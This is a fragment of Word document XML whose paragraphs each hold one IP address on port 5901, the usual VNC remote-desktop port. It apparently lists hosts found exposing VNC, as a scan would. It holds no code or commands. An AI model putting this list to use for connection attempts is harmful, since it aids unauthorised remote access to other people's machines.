    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.38.32.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.41.39.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.55.33.153:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.60.28.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.63.56.110:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.124.56.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.124.92.141:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.124.164.48:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.124.229.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.173.240.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.191.239.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.191.239.58:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.206.36.25:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.4.83.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.4.83.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.248.196.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.247.176:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.111:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">61.50.254.177:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.151:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.50.254.152:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.55.143.210:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.49.19.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.128.111.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.130.108.29:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.47.77:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.208.46:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.208.53:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.241.220:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.132.101.75:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.137.117.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.139.76.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.139.76.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.141.15.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.142.83.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.145.229.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.153.150.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">61.155.59.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.155.212.194:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.156.156.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.200.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.200.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.200.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.159.149.206:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.241.239:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.160.250.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.164.164.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.166.55.171:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.166.55.172:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.251.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.254.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.177.97.1:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.177.139.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.25.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.25.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.170.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.180.25.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">61.180.113.129:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.49.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.214.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.184.203.136:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.182.231.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.191.36.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.191.188.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.219.51.169:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.171.241.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.171.241.225:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">72.20.36.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">72.20.66.180:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">76.10.126.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">78.41.175.246:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">82.154.12.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.39.250:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.39.253:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.39.251:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.106.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.39.251:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.106.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">93.82.219.122:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">93.82.204.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">80.188.220.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">101.95.102.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">103.23.144.194:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">103.23.124.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.80.31.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.81.238.174:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.93.219.214:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.93.219.210:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.93.219.211:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.93.219.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.72.140.175:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.77.220.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.112.7.138:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.117.211.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.117.216.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.137.167.186:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.134.168.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.134.168.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.12.94.158:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.31.64.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">113.107.110.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.107.241.238:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.128.198.138:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.240.251.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.80.154.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.80.221.190:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.81.255.218:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.81.255.222:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.112.56.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">114.135.64.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.148.143.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.168.33.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.151.228.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.168.38.40:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.151.229.77:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.231.103.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.238.31.173:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">115.238.95.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.0.7.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.193.72.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.229.239.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.229.239.181:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">116.235.213.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.246.11.214:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.252.185.108:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.25.128.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.27.142.115:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.19:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.72:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.93:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.28.255.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.32.236.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.34.78.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.34.101.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.37.36.136:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.40.185.130:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.219:5901 </w:t>
      </w:r>
    </w:p>
